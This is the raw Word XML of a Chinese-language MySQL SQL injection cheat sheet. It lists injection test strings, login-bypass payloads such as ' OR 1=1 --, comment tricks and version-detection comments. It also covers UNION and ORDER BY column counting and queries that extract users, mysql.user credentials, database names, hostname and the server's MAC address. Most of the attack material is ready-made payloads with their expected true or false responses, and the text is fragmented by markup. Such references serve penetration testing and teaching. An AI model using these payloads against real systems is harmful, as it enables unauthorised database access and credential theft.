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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>默认数据库</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="2392" w:tblpY="177"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="51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5"/>
        <w:gridCol w:w="3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数据库系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="303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需要root特权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信息模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="303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可从版本5或更高版本获得</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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测试注入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False表示查询无效(MySQL错误/网站内容缺失)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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True表示查询有效(内容照常显示)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="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1、字符串：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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给定查询SELECT * FROM Table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WHERE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id = '1';</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="2520" w:tblpY="153"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9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"/>
        <w:gridCol w:w="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'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''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"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""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\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\\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True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val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         </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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  <w:color w:val="auto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auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT * FROM Articles WHERE id = '1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>';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630" w:firstLineChars="3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Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT 1 FROM dual WHERE 1 = '1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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'''''''''''''UNION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b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Courier" w:hAnsi="Courier" w:cs="Courier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SELECT '2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>';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注释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可以使用任意数量的撇号和引号，只要它们成对使用即可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720" w:firstLineChars="3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也可以在引号之后继续语句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720" w:firstLineChars="3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引号转义引号。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2、数字：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给定查询SELECT * FROM Table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WHERE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id = 1;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="2520" w:tblpY="153"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="4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3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AND 1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AND 0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AND true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AND false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1-false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Returns 1 if vulnerable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1-true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Returns 0 if vulnerable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1*56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Returns 56 if vulnerable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1*56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eastAsia="宋体" w:cs="Verdan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Returns 1 if not vulnerable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 xml:space="preserve">SELECT * FROM Users WHERE id = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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Courier" w:hAnsi="Courier" w:cs="Courier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-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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注释：t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rue等于1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false等于0。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3、登陆：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给定查询SELECT * FROM Table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WHERE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username = ";</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="2835" w:tblpY="240"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="16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' OR '1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' OR 1 -- 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" OR "" =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" OR 1 = 1 -- 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'='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'LIKE'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'=0--+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 xml:space="preserve">SELECT * FROM Users WHERE username =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720" w:firstLineChars="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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'Mike' AND password = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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' OR '' = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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';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leftChars="0" w:right="3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注释掉查询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可以用下面的语句来注释你的查询:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="3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3"/>
        <w:gridCol w:w="3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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="339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Hash comment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哈希的评论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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="339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C-style comment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c风格的评论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-- -</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="339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SQL comment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SQL注释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;%00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="339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Nullbyt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e（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空字节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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="339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Backtick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反引号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例子：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* FROM Users WHERE username = '' OR 1=1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-- -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 AND password = '';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* FROM Users WHERE id = '' UNION SELECT 1, 2, 3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`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Courier" w:hAnsi="Courier" w:cs="Courier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注释：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反号只能在用作别名时用于结束查询。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四、测试版本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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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1、变量：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VERSION()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792" w:firstLineChars="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>@@VERSION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792" w:firstLineChars="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>@@GLOBAL.VERSION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Courier" w:hAnsi="Courier" w:cs="Courier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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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SELECT * FROM Users WHERE id = '1' AND MID(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VERSION()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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,1,1) = '5';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Courier" w:hAnsi="Courier" w:cs="Courier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注释：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如果DBMS运行在基于Windows的机器上，输出将包含-nt-log。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Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26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2、具体代码：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222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/*!VERSION Specific Code*/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Style w:val="8"/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例子：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdan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给定查询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SELECT * FROM Users limit 1,{INJECTION POINT};</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1770" w:tblpY="354"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="66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7"/>
        <w:gridCol w:w="4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1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="CC0000"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>/*!50094eaea*/</w:t>
            </w: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;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Verdana" w:hAnsi="Verdana" w:cs="Verdana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False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-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版本等于或大于5.00.94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1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="CC0000"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>/*!50096eaea*/</w:t>
            </w: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;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True -版本小于5.00.96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1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="CC0000"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>/*!50095eaea*/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"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;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bookmarkStart w:id="0" w:name="OLE_LINK1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False</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0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 xml:space="preserve"> - version等于5.00.95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Style w:val="8"/>
          <w:rFonts w:hint="default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Style w:val="8"/>
          <w:rFonts w:hint="default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Style w:val="8"/>
          <w:rFonts w:hint="default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Style w:val="8"/>
          <w:rFonts w:hint="default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Style w:val="8"/>
          <w:rFonts w:hint="default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Style w:val="8"/>
          <w:rFonts w:hint="default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Style w:val="8"/>
          <w:rFonts w:hint="default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注释：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在由于注入位置而无法向查询添加更多SQL的情况下，这对于确定版本非常有用。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有关特定于mysql的代码的更多信息，请参阅特定于mysql的代码。</w:t>
      </w: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五、数据库认证</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="303"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="84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4"/>
        <w:gridCol w:w="7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表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="706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ourier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
                <w:i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ysql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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返回引用的列</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="706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user, 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当前用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="706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user(), current_user(), current_user, system_user(), session_user()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current_user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 w:firstLine="210" w:firstLineChars="100"/>
        <w:rPr>
          <w:rFonts w:hint="default"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CONCAT_WS(0x3A,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user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 FROM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mysql.user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WHERE user = 'root'-- (Privileged)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars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六、数据库名称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W w:w="5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4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Calibri" w:hAnsi="Calibri" w:cs="Calibri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表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412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information_schema.schemata, mysql.db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返回引用的列</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412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schema_name, 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当前数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412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database(), schema()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">例子： 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database()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840" w:firstLineChars="400"/>
        <w:rPr>
          <w:rFonts w:hint="default"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schema_name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FROM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information_schema.schemata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840" w:firstLineChars="400"/>
        <w:rPr>
          <w:rFonts w:hint="default"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DISTINCT(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db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 FROM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mysql.db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;-- (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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特权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七、主机名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 w:firstLine="540" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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@@HOSTNAME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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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@@hostname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bidi w:val="0"/>
        <w:ind w:firstLine="524" w:firstLineChars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八、服务器MAC地址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9"/>
        </w:tabs>
        <w:bidi w:val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通用唯一标识符是一个128位的数字，最后12位数字由接口MAC地址组成。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1972" w:tblpY="279"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="5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9"/>
        <w:gridCol w:w="3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</w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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right="30" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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UUID（）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="37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通用唯一标识符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ind w:firstLine="389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240" w:firstLineChars="10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输出：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aaaaaaaa-bbbb-cccc-dddd-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eeeeeeeeeeee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240" w:firstLineChars="100"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier" w:eastAsia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注释：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在某些操作系统上，可能会返回一个48位随机字符串，而不是MAC地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="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九、表和列</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="659"/>
        </w:tabs>
        <w:bidi w:val="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1、确定列数</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1820" w:tblpY="198"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8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8"/>
        <w:gridCol w:w="7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</w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8288" w:type="dxa"/>
            <w:gridSpan w:val="2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命令/分组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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="765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8"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier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GROUP/ORDER BY n+1;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注释</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="765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24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="singl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继续增加这个数字，直到得到一个错误的响应。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尽管GROUP BY和ORDER BY在SQL中具有不同的功能，但它们都可以以完全相同的方式用于确定查询中的列数。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2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例子</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="765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 w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>给定查询</w:t>
            </w:r>
            <w:r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SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}';</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="5"/>
              <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="46" w:tblpY="399"/>
              <w:tblOverlap w:val="never"/>
              <w:tblW w:w="738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430"/>
              <w:gridCol w:w="39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8" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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1' ORDER BY 1--+</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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True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8" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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1' ORDER BY 2--+</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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True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8" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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1' ORDER BY 3--+</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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True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8" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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1' ORDER BY 4--+</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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False - </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana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查询只使用3列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8" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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-1' UNION SELECT 1,2,3--+</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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</w:tr>
    </w:tbl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错误1：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1805" w:tblpY="293"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9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8"/>
        <w:gridCol w:w="8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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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8"/>
                <w:rFonts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26"/>
                <w:szCs w:val="26"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>GROUP/ORDER BY 1,2,3,4,5...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注释</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="singl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与前面的方法类似，如果启用了错误显示，我们可以检查带有一个请求的列数。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0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例子</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="8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 w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>给定查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="8"/>
                <w:rFonts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SELECT username, password, permission FROM Users WHERE id = '{INJECTIO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N POINT}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="8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’</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="5"/>
              <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="258" w:tblpY="346"/>
              <w:tblOverlap w:val="never"/>
              <w:tblW w:w="812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01"/>
              <w:gridCol w:w="50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3" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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1' GROUP BY 1,2,3,4,5--+</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="50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“组语句”中的未知列“4”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3" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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1' ORDER BY 1,2,3,4,5--+</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="50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“order子句”中的未知列“4”</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/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错误2：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1835" w:tblpY="120"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9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"/>
        <w:gridCol w:w="8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79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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864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8"/>
                <w:rFonts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26"/>
                <w:szCs w:val="26"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>SELECT ... INTO var_list, var_list1, var_list2...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注释</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864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24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="singl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如果启用错误显示，则此方法有效。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当注入点位于LIMIT子句之后时，这对于查找列数很有用。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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="79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例子1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864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 w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>给定查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial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SELECT permission FROM Users WHERE id = {INJECTION POINT};</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="5"/>
              <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="31" w:tblpY="220"/>
              <w:tblOverlap w:val="never"/>
              <w:tblW w:w="80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615"/>
              <w:gridCol w:w="442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Courier" w:hAnsi="Courier" w:cs="Courier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kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>-1 UNION SELECT 1 INTO @,@,@</w:t>
                  </w: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使用的SELECT语句有不同数量的列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Courier" w:hAnsi="Courier" w:cs="Courier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kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>-1 UNION SELECT 1 INTO @,@</w:t>
                  </w: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使用的SELECT语句有不同数量的列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Courier" w:hAnsi="Courier" w:cs="Courier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kern w:val="0"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>-1 UNION SELECT 1 INTO @</w:t>
                  </w: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没有错误意味着查询使用1列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57" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="79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例子2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864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/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="8"/>
                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体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 w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>给定查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="8"/>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana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SELECT username, permission FROM Users limit 1,{INJECTION POINT};</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="5"/>
              <w:tblW w:w="8400" w:type="dxa"/>
              <w:tblInd w:w="-6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200"/>
              <w:gridCol w:w="42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 INTO @,@,@</w:t>
                  </w:r>
                </w:p>
              </w:tc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使用的SELECT语句有不同数量的列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 INTO @,@</w:t>
                  </w:r>
                </w:p>
              </w:tc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没有错误意味着查询使用2列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tabs>
                <w:tab w:val="left" w:pos="1170"/>
              </w:tabs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Style w:val="8"/>
                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial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</w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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错误3：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1805" w:tblpY="293"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9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8"/>
        <w:gridCol w:w="8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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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8"/>
                <w:rFonts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26"/>
                <w:szCs w:val="26"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>AND (SELECT * FROM SOME_EXISTING_TABLE)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注释</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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24"/>
                <w:szCs w:val="24"/>
